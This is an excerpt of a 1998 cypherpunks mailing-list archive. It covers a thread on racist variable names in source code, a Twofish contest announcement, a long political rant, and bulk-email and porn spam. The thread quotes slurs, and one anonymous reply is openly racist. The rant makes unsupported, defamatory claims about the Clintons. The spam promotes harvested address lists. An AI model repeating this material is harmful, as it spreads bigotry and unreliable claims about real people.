Yes and if I want to name my variables getwatermelons and somefiredchicken
who are you to tell me I can't?

>	One note:  I don't see why this lawsuit would be hard to win
>	on the grounds that source code isn't necessarily "speech."
>	If co-workers left a big wooden swastika on her desk it 
>	wouldn't be speech either, but I'd call that actionable.	

But they didn't. There is no proof that any of theses variable names were
written to be directed at her and the majority of them were written
*before* she ever started working there!!

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Not just another pretty program loader!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeM6Qo9Co1n+aLhhAQEHMAP+OdR38utDHJd4s8r3/fTVedI+xH9A+lNX
CU/yeqOx2Y9P8K/ol1wdLf4U3Dzv3VZ+CvRUmVB4juRdFBTnor7wrS3CQiQ1krut
K3nLi7HtUqb92VD55eCM4W61c67lqLTD7TTXW2p6sHm8ti3NgK1fGfRPTSk5Ay9S
j2tEl6HI5P8=
=jRNy
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Tue, 25 Aug 1998 17:54:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Quote of the Day: Bullshit by the horns
Message-ID: <3.0.5.32.19980825175356.008177f0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


	
The jist of what the NIST dude running the AES program to Crypto 98, UCSB
25 Aug: 

"We are looking for an algorithm acceptable to you and to the NSA"

No one doubled over in laughter, at least physically.


over and out





There is a secret message embedded in the phosphor of this period.



  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@suburbia.net
Date: Tue, 25 Aug 1998 10:56:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Is hate code speech?
Message-ID: <19980825175524.13582.qmail@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


IS YOUR FAVORITE COMPUTER PROGRAM RACIST?

Texas programmer sues former employer over offensive code.


When Willa Jackson started working the night shift at Integrated
Systech in Austin, Texas, she felt she was entering a world filled with
opportunity. Jackson had just completed three years of intensive course
work in computer programming at a local community college and, at the
age of 47, had recently been hired by the successful software
developer. Her night-shift position at IS was to be Jackson's first
non-minimum wage job.


But that optimism soon turned to shame and then anger as Jackson
discovered that many of her colleagues at IS were accustomed to making
racist jokes in the office. In fact, the epithets were never actually
uttered in Jackson's presence, they were encoded within the dozens of
software applications being developed at IS.


Her painful discovery occurred less than one month after she began
working as an entry-level programming assistant. It was Jackson's
responsibility to find bugs in sections of code that other,
higher-level IS programmers produced during the day. But when Jackson
-- an African-American woman who hopes to one day launch her own
software startup -- began to dig deeper into a faulty section of source
code she was mortified by what she found.


Programmers at the company had been using racist monikers and explicit
sexual language in the variables used by their programs to sort
information. In one instance, a program had been instructed to "fetch
watermelons" and "somefriedchicken" when handling a certain procedure.
The handler had even been dubbed "pickaninny" and was only one of
several dozen like sequences embedded in IS programs designed for home
and office use.


When Jackson showed the racist code to her supervisor she was assured
that IS would act decisively to reprimand and possibly even dismiss the
offending employee. But as weeks passed and no one approached Jackson
with a follow-up to her complaint, she began to suspect that no
disciplinary action would be forthcoming. At that point, Jackson began
to pore over the mountains of used code that IS had stockpiled over the
past six years.


Much to her dismay, Jackson discovered derogatory and occasionally
violent terms inside the programming language used by almost all IS
software programs. "It went all the way back to the first version of
ISDisk," explains an incredulous Jackson, "and they never bothered to
hide it." Shortly after she had printed out over a thousand pages of
tainted code, Jackson hired an attorney and filed a $10 million dollar
lawsuit against the profitable software firm.


Just who is responsible for the recurring use of discriminatory
language in the company's computer code is still a mystery. IS
executives have issued several public apologies since the lawsuit
began, but they have yet to cooperate with the investigation into its
allegedly hostile work environment. In 1996, Texaco paid out $140
million to resolve a similar lawsuit brought by its minority employees.
But labor law experts speculate that the IS case may never be resolved
due to the unprecedented circumstances of the alleged misconduct.


"No jury in this state will believe that the code Jackson found is
speech," argues Mitch Shapson, an attorney with  the labor relations
firm of Stennis, Shapson & Velasquez. "Even if they did think the
messages hidden inside the programs were offensive," continues Shapson,
"it would be like trying an auto manufacturer for putting a
Swastika-shaped part in your car's engine."


Jackson, who is now working as a full-time programmer at Dell Computers
in San Antonio, is not willing to give up her fight against IS despite
the slim chances of a legal victory. "At this point, I'm not interested
in the money," claims an unbowed Jackson, "I only want the public to
think twice about the kinds of hateful messages that may be hidden
inside the software they use everyday."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Geer <geer@world.std.com>
Date: Tue, 25 Aug 1998 17:31:13 -0700 (PDT)
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: Reinsch: Crypto export law changes soon.
In-Reply-To: <D104150098E6D111B7830000F8D90AE824060C@exna02.securitydynamics.com>
Message-ID: <199808260031.AA07893@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain



current

    http://www.npr.org/programs/totn/archives/1998/current.html

durable

    http://www.npr.org/programs/totn/archives/1998/980824.totn.html

--dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Tue, 25 Aug 1998 18:29:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Announcement: $10,000 Twofish Cryptanalysis Contest
Message-ID: <4.0.1.19980817211658.00e7be20@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain


To stimulate research into Twofish, the designers are putting their money
where their mathematics is. They are offering $10,000 in prize money for
the best attack on Twofish during the first round of the AES evaluation.

This contest is very different from most other cryptanalysis contests.
There is no ciphertext to decrypt, and no key to find. Instead, the $8,000
first prize will be awarded to the person or group (other than the Twofish
design team) that publishes the best cryptanalysis of Twofish. The runner
up will get a $2,000 second prize.  To qualify the cryptanalysis has to
contain a significant new result not published earlier by the Twofish team.
If no new results are published, the prizes will not be awarded. The
deadline of the contest is NIST's deadline for first-round AES comments;
the result should be presented in a format compatible with the NIST
requirements for first-round comments.  Decisions of the judges (the
Twofish design team) are final.

Good luck,
Bruce 

**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Tue, 25 Aug 1998 18:49:19 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: Is hate code speech?
In-Reply-To: <199808252227.RAA004.35@geiger.com>
Message-ID: <Pine.SUN.3.91.980825202006.3834A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Aug 1998, William H. Geiger III wrote:

> Yes and if I want to name my variables getwatermelons and somefiredchicken
> who are you to tell me I can't?

	Nobody's saying that you can't.  This is about liability for
	the _results_ of what you type.  The same goes for libel:  
	nobody's saying you _can't_ declare that McDonalds puts dead
	rats in their hamburgers, but hoo boy can you and your boss get
	sued to pieces if you do.  Nothing new here.

	Further, this is about someone writing code for a company, 
	where others read it; not you, Bill Geiger III, writing code
	in the privacy of your own basement.  Yes, you will get your ass 
	fired clean off of its hinges if you treat company source code as 
	your own little bathroom wall.  

	As for the fact that this code was put there before the woman's
	arrival, and pretty clearly not intended for her, that may be 
	important in the suit.  I don't know how successful harassment
	suits are when the harassment is undirected --- i.e., crude
	graffiti, leaving a copy of Playboy lying around, etc.

	On the other hand, only a moron would write source code for
	a commercial product without the assumption that other people
	will be reading it, and in fact will *have* to read it to get
	paid.  Any arguments that the coders didn't intend/expect that
	the messages would one day be read by a black person is pretty
	weak.

	All in all, then, I'd say she has a good chance of winning.
	The whole bit about source code not being speech is irrelevant,
	IMHO, since harassment still counts if it ain't speech.  The
	company's only real defense is to rely on the judge & jury's
	technical confusion about what this "source code" stuff is.
	
							-Caj

	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Tue, 25 Aug 1998 14:48:30 -0700 (PDT)
To: Undisclosed recipients:  ;
Subject: illegitimate America
In-Reply-To: <3.0.3.32.19980825102812.03678894@earthlink.net>
Message-ID: <Pine.BSF.3.96.980825163942.14029P-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain




    I heard Clinton's voice for the first time -really- at the barbershop 
    on Wed. I thought he was labeled a great speaker --his accent is one 
    thing, but the resonance I expected was more nasal and hard (despite
    the fact he was on the attack). 

    one thing was immediately apparent from his body language --mean,
    a wounded jackal, and the ominous signs of a dirty fighter just below 
    the surface. he should have been a circus barker or patent medicine
    hawker.

    I dont remember what Clinton said as it was just the usual accusations 
    of persecution. a made for TV president? I suppose, when you consider 
    what TV, the potentially great teacher, degenerated to: nothing
    more than bread and circi, gladiators and moral decadence. the average
    six year old has seen 2,000 murders, many of the graphic --and then
    we wonder why the current generation has no concept of the value
    of life, or that death and sex are easy and maybe interchangeable?

    I read part of Clinton's text --no speech writer in Washington, even 
    the real slime-balls, even James Carville, would, on camera, skirt the 
    whole issue, not even admitting to the concept of a sexual affair; 
    dismissing the faked apology in 30 seconds and then spending 3 1/2 
    minutes in a fierce, partisan, false-premise attack on Starr.
 
    there was a NYTimes story on Jordon.  apparently Jordon dropped
    a bomb with the grand jury stating he had been deceived by Clinton.
    likewise, Betty Currie hung him out to dry and that she had been
    used. Jordon was not willing to take the fall for Slick Willie, or
    even be a part of deception. Jordon has been around too long, and
    is a respected part of the Washington legal crowd (well, as 
    respectable as lawyers can ever be...).  Betty Currie, black, is
    known as a Christian, righteous and dependable, the last stop before
    the boss for years --she came with Clinton from Arkansas.

    that man is dangerous....

    Ambrose Evans-Price is back in Washington --I suppose for the kill;
    expect him to really start digging again to finish his prior work.

    Bubba is a 3 year old who has had a toy (which he stole from a 2
    year old) taken away from him, and is truculently throwing his
    tantrum as if his g_d-given rights to rape, pillage, and burn were
    being trampled.

    I have subscribed to the oft stated presumption that Clinton is
    an illegitimate Rockefeller --Lawrence, Winthrop's brother. Hot
    Springs and the countless door openings. the story of a William
    Blake, a traveling salesman, was pure swamp-water; they picked 
    Blake since he was dead --remember the second half-brother
    (paternal) which turned up right after election whose mother 
    actually was married to Blake --sure like to see a DNA comparison. 

    As a pure Poor Southern White (trailer) Trash, Clinton would never 
    have been given the opportunities he received. Bubba has the strange 
    mix of the trailer trash he really is and the connections of the 
    Rockefellers. Clinton is not the only extremely intelligent 
    child to grow up in an Arkansas trailer park, but he is probably is
    the only one to do more than wear his CAT or Mack cap backwards.

    my friend, foreign correspondent Eric Margolis said yesterday:

	A number of readers have reminded me I predicted four years 
        ago Clinton would be undone by personal scandals in his second
        term.  I didn't need a crystal ball.  Having observed Clinton's
        career since he followed me by two years at Georgetown University,
        I knew he was a ruthlessly ambitious politician, whose utter lack
        of honesty, character, or honor would one day bring him low.

    consider the book Primary Colors, of which (joe?) Klein has been
    unmasked as the writer:  it exposes the total lack of character in 
    both Bill and Hillary --total amorality, riding scandal after scandal 
    with plausible denials. affair after affair... and there is a
    white-black child in Australia, but the mother is silent --money or
    fear?  more DNA anyone?

    someone else made the comment that the women consider him a likable
    rogue --soap opera. Clinton plays the women like violins, pressing
    all the hot buttons of the 25-45 class and they give him a 20-25%
    edge, a figure quoted by many polls and, of course, it was enough 
    to dump "just plain ol' dull George".

    Margolis made another interesting (and obvious) comment:

    	Far from the wronged, last-to-know wife, Hillary Clinton is an
	Arkansas Lady Macbeth. She is the guiding force behind the Clinton
	presidency, who accepts her husband's sleazy infidelities as a
	price of power.  Mrs Clinton's ardent left-liberal views did not
	deter her from taking $100,000 in commodity payoffs from big
	business, spearheading the Whitewater land fraud, hiding documents
	from government investigators, terrorizing White House employees,
	or amassing illegal files on Republicans.

    nothing we have not known, but better stated.

    a way of life... can you even consider the Clintons a dysfunctional
    family?  --it's more like something out of Charles Adams. Angela
    Houston played the perfect Hillary, and her sleazy husband fits Bill.

    it makes you wonder about Chelsea. there she was on the tarmac with
    her father, ugly as ever, but up front. she may have looked like
    she had been whupped by an ugly stick (normal), but she sure wasn't
    hiding --how can she return to Stanford this fall? being the daughter
    of a sitting President isn't easy --but Chelsea? (...and we thought
    Amy had a tough time...).

    more Margolis:

	The Clintons haven't yet been caught red-handed because they are
	both lawyers, the curse of modern America.  Both knew precisely
	how to conceal their questionalble dealings behind an impenetrable
	smokescreen of legal ambiguities, how to skirt the law and avoid
	open illegality, to never leave written evidence. That's why the
	Special Prosecutor, Judge Starr, has had such a difficult time in
	untangling the Gordian Knot of the Clinton's finances...

    "...lawyers, the curse of modern America" --yes, the U.S. has honed
    their skill to a new and deeper cesspool, but the lawyers have been
    with us from antiquity --the Pharisees, for instance.

    well, let's see if my 1986 prediction, even before the name Clinton
    burst upon the national political scene, falls into place. Bush could
    very well be the last U.S. president to finish his elected term. any
    way the game plays out now is a potential disaster. Clinton is not
    going to leave office willingly or voluntarily and Hillary's FBI
    files will just be a beginning for the Republicans --even the NYTimes
    and Washington Post will end up looking like the National Enquirer
    in this blood bath.

    a)  impeachment: James Carville will have a field day opening the
	Congressional sewer. Clinton will still be commander-in-chief
	and the U.S. will quickly be in a foreign war which will bring
	actual warfare to the American land. 

        if Al Gore, with his unfolding problems, moves to 1600
        Pennsylvania, the welfare state will roll out of the garage and
        take off --the military falling	into disarray, unprepared and 
        unsupplied to keep the lid on Pax Americana.  America is not
        loved, probably not even by the Brits as they hang in there now 
	since they need the company while they play standoff with the EC.

    b)  assassination: I dont think the country could survive another
	one, and the results following the chaos would be the same.

    c)  accident:  there is a joke running around about Clinton visiting
	a class room and asking if anyone knew what a 'tragedy' was.

	the first child suggested when a friend is run over on a bike.
	Clinton said no, that would be an 'accident'.

	a second child suggested when a school bus went over a cliff.
	Clinton said no, that would be a 'great loss'.

	finally, a child said that a 'tragedy' was if an airplane
	   carrying Bill and Hillary crashed and they were killed.

        Clinton said that yes, that would be a 'tragedy' and asked
	   the child why that would be a 'tragedy'.

	"Simple", said the child, "it wouldn't be an 'accident' and it
	   certainly would not be a 'great loss'".

    this begs the old joke of how do you create a "flood"...?

    Janet Reno has been protecting Al Gore for some several years, but
    the pot is beginning to show foul smelling fistules. the campaign
    funds sleeze which oozes out of that pot will cripple the Democratic 
    party --the fund swapping with the Teamster president's election 
    fund alone is pure racketeering, while the Chinese connections are 
    treasonous.  and the Democrats will retaliate in kind.
	
    you cant vote the politicians out of office --the inbred
    two-party (supposedly) system is self-sustaining with reformers 
    learning very quickly that reelection is dependent on playing the 
    line, with few notable exceptions.  this collection of power
    hungry thieves drops sleeper legislation into unrelated laws,
    legislation which now brings us a national ID card by fall 2000,
    complete with biometrics, credit record, driving record, criminal
    record, medical record, and whatever else they want to slide in 
    --the mark of the beast is upon us and "the number of the beast
    is six hundred  three score and six". [RV 13:15-18]

    the American people can not win a war against Washington; Clinton and
    friends would not hesitate to use UN troops against American targets;
    and who can supply a rebel army today? is Russia going to help the
    "patriots" with arms and supplies and provide the clandestine
    radio/TV facilities?  besides, Clinton's Gestapo is root out and
    exterminating the militias. militias composed today of only of the
    foolish brave.

    that leaves massive civil disobedience --such as withholding taxes. 
    but joe six pack and friends are never going to accept what that 
    means --the destruction of the U.S. infrastructure and the consequent 
    invasion of America by her "friends" to divvy up the spoils and 
    subjugate what's left of the population --probably less than 50 
    million when the cities collapse and are wasted.

    unfortunately, joe six pack will be trying to tune in another sitcom
    when it all collapses --when the cold beer runs out, he will only
    be confused.

    pessimism? I dont think so.  the question is "when?" 

    the cards are all on the table:  world economics, Islamic jihad 
    (the cruise missiles coalesced the divergent groups into even more
    hatred), irresolvable corruption in virtually all national
    governments: total instability in Russia, the Japanese "house of 
    cards" with a gangster compromised political system which will not
    force the changes required, and China about to pay the piper for
    her financial cronyism.

    the "conspiracy" theorists have no clue. there is no conspiracy.

    it's nothing more than greedy men around the world, in concert 
    with corrupt governments who have taken away any semblance of 
    civilization's morality.

    the worldwide unfunded paper credit is bigger than even the 
    central bankers can even conceive, let alone handle; it is estimated
    that 80% of the float is in paper copies of credit card debt and
    checks traversing the system. a 10% loss is enough to level most
    balance sheet. even Microsoft with its ill-gotten filthy lucre
    could not sustain a 20% write off, or an  80% collapse.

    a global crash this time around will cripple mankind, plunging the 
    globe into starvation and disease as the infrastructure implodes.

    the U.S. is the most vulnerable --how many can be supported in the
    population centers? who survives? probably less than 1% of the 
    urban population --lack of water, food, and sanitation; the last
    is the real killer.  much of the third world lives in squalor;
    but their mortality rate will only be set back 50 years.

    armies move on their stomachs and require enormous supply trains of 
    food and ammo. America settled two European wars (plus the Japanese)
    by being able to feed and arm both our armies and those of of our 
    allies.

	consider that _one_ production line in Southern California was
        cranking out a new B29 every 30 minutes --48 per day-- that's
        production, and Rosie the Welder. and the knowledge, in wartime 
        Germany, of another B29 every 30 minutes --from one line, was
        was demoralizing as the payloads were devastating.

    you cant do that when your infrastructure is being bombed by the
    continuous flow of more and more U.S. B24s and B29s  --ask Germany.

    and then people wonder why I live in the Intermountain Empire --but
    probably not far enough from its borders.

	attila out...    rant mode off.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nii21@allnetwork.com.br (mail)
Date: Tue, 25 Aug 1998 13:01:17 -0700 (PDT)
To: nii21@allnetwork.com.br
Subject: I called you at work but you weren't there?
Message-ID: <199808254091SAA30919@smtp.alpirsbach.netsurf.de.>
MIME-Version: 1.0
Content-Type: text/plain


JUST RELEASED...



30,000,000 Email Addresses! Plus 12 Bonuses...



Including Free Stealth 3.0 Bulk EMail Software...($399.00 value)


These addresses are the freshest on the internet.



EARN INSANE PROFITS WITH THE RIGHT FORMULA



If you have a product, service, or message that you would like to get out 

to Thousands, Hundreds of Thousands, or even Millions of people, you 

have several options.Traditional methods include print advertising, direct 

mail, radio, and television advertising. They are all effective, but they 

all have two catches: They're EXPENSIVE and TIME CONSUMING. Not 

only that, you only get ONE SHOT at making your message heard, by 

the right people.



The INTERNET, the "Global Communications Frontier" has changed 

this dramatically, including making countless individuals wealthy. 

"Electronic Marketing," as it's commonly referred to, has effectively 

leveled the playing fields of all types businesses.



Internet Marketing Group has been in the online marketing business 

for over 5 years. We can help make your goals come true. We have 

helped many individuals succeed in marketing their product effectively. 

It's very simple to do. In fact soon you will have the problem of what 


to do with all the cash you will make from sending out bulk email. 



Here is just one of many true success stories we have seen...



We did a mailing of 1 1/2 million emails for one of our customers. He 

was selling a home workers manual for $29.95. His results are very 

typical and scary. He took in over 700 orders! 700 x $29.95 = $20,000. 

This gentleman was so amazed, that after being skeptical, it had 

really happened to him, he made it, he found a niche. That niche 

was email! He went on to buy our full list and will be set for life in 

less than six months time. All this from selling a simple manual via 

e.mail.



That was just one of the many success stories we hear everyday. 

It may all sound to good to be true. Well, we can tell you this. 

It really does work. Why else are so many individuals doing it? 

They are not just wasting their time. They are all making mega 

bucks.



Don't even hesitate on this one or you will miss out on the most 

effective way to market anywhere..PERIOD!

            
HERE'S THE BOTTOM LINE AND WHAT WE CAN DO FOR YOU!


Here is what you get when you order today!



>> 30 Million Email Addresses... 1 per line in simple text format on a CD.


Multiple files of 250,000 or greater (no codes needed to open files). You 

will receive email addresses of the following domains... AOL, PRODIGY, 

COMPUSERVE, DELPHI, GENIE, JUNO, PIPELINE, INTERAMP, MSN, MCI, 

and 5 MILLION OTHER MIXED EMAIL ADDRESSES (.com, .net). All names 

listed above are seperated in files by domain name for your convenience.



PLUS THESE BONUS SPECIALS...



>> 2 Free Bulk Email Programs...Pegasus and Eudora. You will be able

to load our names into these 2 Distribution List Software's (which will 

create Distribution Lists Saving you hours of work) for immediate, 

around the clock launching! You can whip out as many distribution 

lists as you like, and depending on the speed of your modem and 

the length of your message, you will be able to send out around

10,000 to 30,000 messages per hour for free.



>>"Stealth Mass Mailer" Bulk Email. This is the most popular bulk emailer 

in the world. You can drive it for free. This product sends over 250,000 

emails per hour. It's yours to use forever. This is nota demo version.  

It's the full working version!

>>Setup and mailing tips for Stealth 3.0 Bulk Emailer.



>> Super Note Pad... This software will help manage your large text 

files for you.



>> Winzip Self Extractor... This program will be needed when

de-compressing a compressed file. It will come in handy when 

dealing with files of zip format.




>> Over 5,000 Places To Advertise For Free!



>> "Profits 2500 Series"... 7 manuals that will teach you how to market 

on the internet and what offers work and which ones to stay clear of. 

Also we will show you where to find web designers for free and much, 

much more.

>>Free "Check by Fax" software ($299.00 value)	


* A list of 6 (or more) servers that work in getting out your email

* The free website for your business or product

* A website that contains millions of email addresses


YOU GET EVERYTHING FOR ONLY $189.00 



>>>SPECIAL BONUS... If you order within 48 hours you can deduct

$50.00 from the listed price. Limited time only! 



We have previously sold the seven manuals alone for over $400. Now 

you can have the complete package for the low price of only $139.00



Don't even hesitate on this one.. Reserve yours today!



All lists are completely free of any Duplicates. We also on a 

continual basis, add New Names and Remove Undeliverables and 

Remove Requests. 



The result is the Cleanest Email Addresses Available Anywhere 

to use over and over again, for a FRACTION of the cost that other 

companies charge. Typical rates for acquiring email lists are from 

1 cent to as high as 3 cents per email address - that's

"INFORMATION HIGHWAY" ROBBERY!.



                     How do I protect my e.mail address?



1st of all, send your e.mail with the Stealth Mass Mailer. This program will

protect your email address while sending your e.mail at speeds of up to

250,000 messages per hour (28.8 connection).



2nd, collect your inquiries and remove requests via AutoResponders . Using

AutoResponders, you don't even have to read the flames. Just move them to

your remove list and forget about them!

To be instantly removed from all mailing lists go to: http://www.remove-list.com



Start earning mega money and get started now!



To order our email package, simply print out the EZ Order form 

below and call us anytime.



We accept Visa ,Mastercard,American Express, Personal Check 

or Money Order.

----------------------------------------

EZ Order Form 



Call our 24 Hour Order Line at: 1-561-697-0657 (orders only)



We will deduct an additional $2.00 for all phone orders.

 

_____Yes! I would like to order your 30,000,000 email addresses 

Plus all the bonuses for only $189.00



_____I am ordering within 48 Hours! Please deduct $50.00 from

the price making the total only $139.00



*Please select one of the following for shipping.



____I would like to receive my package Express(1-2days) Mail. 
I'm including $12 for shipping.



____I would like to receive my package PROIRITY (3-4 days) Mail. 
I'm including $4 for shipping.



____Please add $10.00 for all orders from outside the U.S.



DATE____________________________________________________



NAME____________________________________________________



ADDRESS_________________________________________________



CITY, STATE, ZIP_________________________________________



PHONE NUMBER_________________________________________



EMAIL ADDRESS__________________________________________


WHAT THE HEADLINE SAID BEFORE YOU OPENED THIS EMAIL?____

_______________________________________________________


TYPE OF CREDIT CARD: 

______VISA _____MASTERCARD____AMERICAN EXPRESS



CREDIT CARD# __________________________________________



EXPIRATION DATE________________________________________



NAME ON CARD__________________________________________



AMOUNT $___________________

 

SIGNATURE:x________________________



DATE:x__________________

----------------------------------------------------

Best of Luck!!



We apologize if this e.mail was sent to you in error.



To be permanently removed from all mailing lists simply

go to: http://www.remove-list.com




Thank You!




















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "bman offer" <97343818@14683.com>
Date: Fri, 11 Sep 1998 01:06:29 -0700 (PDT)
To: do@mnfmfgg.com
Subject: Bulk emailing service
Message-ID: <445877496358.PAA93871@mailhost1.cochems.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>

Bulkman Direct Email Promotion

Bulkman --> Call (336) 214-0344 for ordering information,custom orders, and Website information.  

Bulkman Services offers professional, effective direct email advertising to promote your business 
or website.  With our service you will reach thousands of people who are interested in what you 
have to offer.  We can send up to 500,000 emails out for you with your own sales letter.  The 
email addresses that we use are freshly extracted daily from people actually online either 
chatting or surfing! Plus, the people who receive your email aren't overloaded with other offers.  
We also offer targeted emailing using a target audience that you specify, for example - music lovers, 
single mothers, college students, etc.  

We use up to date, high quality programs to effectively extract fresh addresses and successfully mail 
your message.  This is why our service is more effective than others. 

Bulkman will give the sales boost you've been looking for.  Try out our services and  you will be 
overloaded with response and sales!!!


We accept any questions and phone orders -   

Call --> (336) 214-0344    - Anytime -
     --> please leave a voicemail message and you will be contacted shortly








</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 25 Aug 1998 20:34:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is hate code speech?
Message-ID: <199808260334.FAA10228@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Aug 1998, Xcott Craver wrote:

> 	On the other hand, only a moron would write source code for
> 	a commercial product without the assumption that other people
> 	will be reading it, and in fact will *have* to read it to get
> 	paid.  Any arguments that the coders didn't intend/expect that
> 	the messages would one day be read by a black person is pretty
> 	weak.

Oh, I don't know. After all, we all know that blacks are so descriminated
against. That's why we "need" such things as quotas, affirmative action,
"dumbing down" of test scores, special versions of standardized tests for
blacks, ebonics, and other such great ideas. Therefore, analyzing the
government party line, it is perfectly reasonable to have assumed that
blacks would always be so descriminated against as to never get hired for
such a position.

Right.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Wed, 26 Aug 1998 02:36:48 -0700 (PDT)
To: (STUFFED WEDNESDAY AUGUST 26 1998)
Subject: STUFFED IS NOW *HOT* STUFFED!/Check out all the new FREE hi-res pics and stuff!
Message-ID: <19980826071000.26319.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday we published a special issue of Stuffed and SEVEN
times more  readers than usual  visited the site.  This has
echoed what  you've been telling us in your emails,  so now
STUFFED is renamed to HOT STUFFED,  and we are bringing you
just the features  and pics you asked for.  Later this week
we'll  also release  a great new interface  that will down-
load our  pages 5-10  times faster.  We listen  to what you
you say and strive  to make STUFFED exactly the publication
you want!  Check out today's  great changes  and new stuff!

       ---->   http://stuffed.net/98/8/26/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/8/26/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Scher <strange@tezcat.com>
Date: Wed, 26 Aug 1998 05:33:20 -0700 (PDT)
To: lacc@suburbia.net
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <Pine.SUN.3.91.980825155854.3483A-100000@baker>
Message-ID: <Pine.SUN.3.95.980826072937.21224B-100000@huitzilo.tezcat.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Aug 1998, Xcott Craver wrote:
> On Tue, 25 Aug 1998, William H. Geiger III wrote:
> > <sigh> Now we have to worry about PC variable and function names. What a
> > crock. 

Um, er, I think, though I am not sure, that the issue in question is
either a hypothetical (judging from the article disclaimer), or that if
not, it just about ought to be.  It is the precise set of facts to lean
for the opinion that program code is meaningful speech or activity due
the full protection of the First Amendment.  I.e., a case with these facts
 
> 	Oh, yeah, you really have to worry about *accidentally*
> 	calling your variables getwatermelons and somefriedchicken.
> 	Reminds me of this one guy in our neighborhood who was just
> 	jogging by our house, bent down to tie a shoelace, lost 
> 	his balance and accidentally planted a huge burning cross
> 	in our front lawn.  Woops!  Those damn PC-mongers are 
> 	making it a crime to jog!
> 
> 	One note:  I don't see why this lawsuit would be hard to win
> 	on the grounds that source code isn't necessarily "speech."
> 	If co-workers left a big wooden swastika on her desk it 
> 	wouldn't be speech either, but I'd call that actionable.	
> 
> 	Another note:  frivolous naming conventions are dangerous
> 	for more than one reason.  Some Y2K firms scan COBOL code
> 	for variables which are likely to be dates, using the actual
> 	variable names for clues; this is much less likely to work if 
> 	you name your field BLOW-JOB instead of ESTIMATED-START-DATE.
> 
> 							-Scott
> 

Michael Brian Scher   (MS683)  | Anthropologist, Attorney, Policy Analyst
     strange@cultural.com      |     http://www.tezcat.com/~strange/
     strange@uchicago.edu      |           strange@tezcat.com
   Give me a compiler and a box to run it, and I can move the mail.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Scher <strange@tezcat.com>
Date: Wed, 26 Aug 1998 05:37:43 -0700 (PDT)
To: lacc@suburbia.net
Subject: Re: LACC: Re: Is hate code speech? (fwd)
Message-ID: <Pine.SUN.3.95.980826073325.21224C-100000@huitzilo.tezcat.com>
MIME-Version: 1.0
Content-Type: text/plain


GAH.  Sorry about that truncated comment -- Morning misfire - went to
postpone to look up cites and sent instead.  Grumble finger macros,
grumble. 

The upshot being that a hostile work environment/harassment case with
these facts would serve as a great 'tie breaker' in any Supreme Court
decision between the "code is not speech" and "code is speech" split we're
seeing between federal jurisdictions. 

That is to say, in the American jurisprudence system, if you want
something protected from prior restraint as speech, you also have to take
the responsibilities the system imposes on you for the effects of that
speech. 

      -M

Michael Brian Scher   (MS683)  | Anthropologist, Attorney, Policy Analyst
     strange@cultural.com      |     http://www.tezcat.com/~strange/
     strange@uchicago.edu      |           strange@tezcat.com
   Give me a compiler and a box to run it, and I can move the mail.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leif Ericksen <phantom@wwa.com>
Date: Wed, 26 Aug 1998 05:55:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is hate code speech?
In-Reply-To: <199808251952.OAA001.81@geiger.com>
Message-ID: <35E404DB.96F9FBFA@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> 
